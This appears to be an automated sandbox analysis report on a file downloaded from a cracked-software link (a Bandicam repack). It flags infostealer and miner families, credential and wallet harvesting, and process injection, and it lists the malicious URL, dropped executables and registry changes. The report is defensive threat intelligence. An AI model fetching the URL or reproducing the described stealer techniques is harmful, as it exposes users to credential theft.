Analysis Overview
Threat Level: Known bad
The file https://yodgxd060624l18.xyz/233d788293f695acc5b1665af5fbd41f4c800440_1718387358/file-dln_666c829edcecf/?source=12&grp=17&file=&q=Bandicam-7-1-1-2158-with-Crack--RePack---Portable- was found to be: Known bad.
Malicious Activity Summary
Stealc
xmrig
Vidar
Detect Vidar Stealer
Amadey
XMRig Miner payload
Downloads MZ/PE file
Blocklisted process makes network request
Reads user/profile data of local email clients
Loads dropped DLL
Executes dropped EXE
Reads data files stored by FTP clients
Registers COM server for autorun
Reads user/profile data of web browsers
UPX packed file
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Modifies data under HKEY_USERS
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Delays execution with timeout.exe
Suspicious use of SetWindowsHookEx
Analysis: static1
Detonation Overview
Reported: 2024-06-14 17:58
Signatures

Analysis: behavioral1
Detonation Overview
Submitted: 2024-06-14 17:58
Reported: 2024-06-14 18:08
Platform: win10-20240404-en
Max time kernel: 599s
Max time network: 597s
Signatures
Amadey
Detect Vidar Stealer
Stealc
Vidar
xmrig
XMRig Miner payload
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\!#Fileş_#!UŞe_Passw0rd___._140617_.___\!#Fileş_#!UŞe~Passw0rd__~.~140617~.~__\Setup.exe | N/A |
| N/A | N/A | C:\ProgramData\DGIJEGHDAE.exe | N/A |
| N/A | N/A | C:\ProgramData\HJJJECFIEC.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
UPX packed file
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | href.li | N/A | N/A |
| N/A | href.li | N/A | N/A |
| N/A | href.li | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1260 set thread context of 3320 | N/A | C:\Users\Admin\Downloads\!#Fileş_#!UŞe_Passw0rd___._140617_.___\!#Fileş_#!UŞe~Passw0rd__~.~140617~.~__\Setup.exe | C:\Windows\SysWOW64\netsh.exe |
| PID 2220 set thread context of 3724 | N/A | C:\ProgramData\DGIJEGHDAE.exe | C:\Windows\SysWOW64\ftp.exe |
| PID 3460 set thread context of 2884 | N/A | C:\ProgramData\HJJJECFIEC.exe | C:\Windows\SysWOW64\ftp.exe |
| PID 2884 set thread context of 2856 | N/A | C:\Windows\SysWOW64\ftp.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe |
| PID 2856 set thread context of 2820 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\7-Zip\descript.ion | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\kk.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pl.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zG.exe | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ba.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ca.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tg.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tk.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.sfx | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\History.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fi.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\si.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sr-spl.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\az.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\io.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\vi.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\be.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fa.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ky.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sr-spc.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\uz.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\zh-cn.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ka.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mn.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ku-ckb.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\nl.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sl.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zFM.exe | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\eu.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng2.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7-zip.dll | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Uninstall.exe | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\hy.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\yo.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fr.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ms.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\gu.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ta.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\el.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ja.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sq.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.exe | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\nb.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ne.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\th.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.dll | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\he.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7-zip.chm | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\bg.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sa.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\readme.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zCon.sfx | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\an.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\bn.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fy.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pa-in.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ro.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\uk.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\en.ttt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\lt.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mk.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ru.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sv.txt | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\TWI Cloud Host.job | C:\Windows\SysWOW64\ftp.exe | N/A |
| File created | C:\Windows\Tasks\Watcher Com SH.job | C:\Windows\SysWOW64\ftp.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\coml.au3 | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133628615154628920" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000} | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\!#Fileş_#!UŞe_Passw0rd___._140617_.___\!#Fileş_#!UŞe~Passw0rd__~.~140617~.~__\Setup.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\ProgramData\DGIJEGHDAE.exe | N/A |
| N/A | N/A | C:\ProgramData\HJJJECFIEC.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\7z2406-x64.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://yodgxd060624l18.xyz/233d788293f695acc5b1665af5fbd41f4c800440_1718387358/file-dln_666c829edcecf/?source=12&grp=17&file=&q=Bandicam-7-1-1-2158-with-Crack--RePack---Portable-
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffaa09f9758,0x7ffaa09f9768,0x7ffaa09f9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1560 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2056 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2924 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2936 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4404 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5100 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5144 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5296 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3056 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2bc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5508 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3016 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5808 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5716 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3620 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1700 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6056 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5432 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6372 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6376 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6524 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Users\Admin\Downloads\7z2406-x64.exe
"C:\Users\Admin\Downloads\7z2406-x64.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5404 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
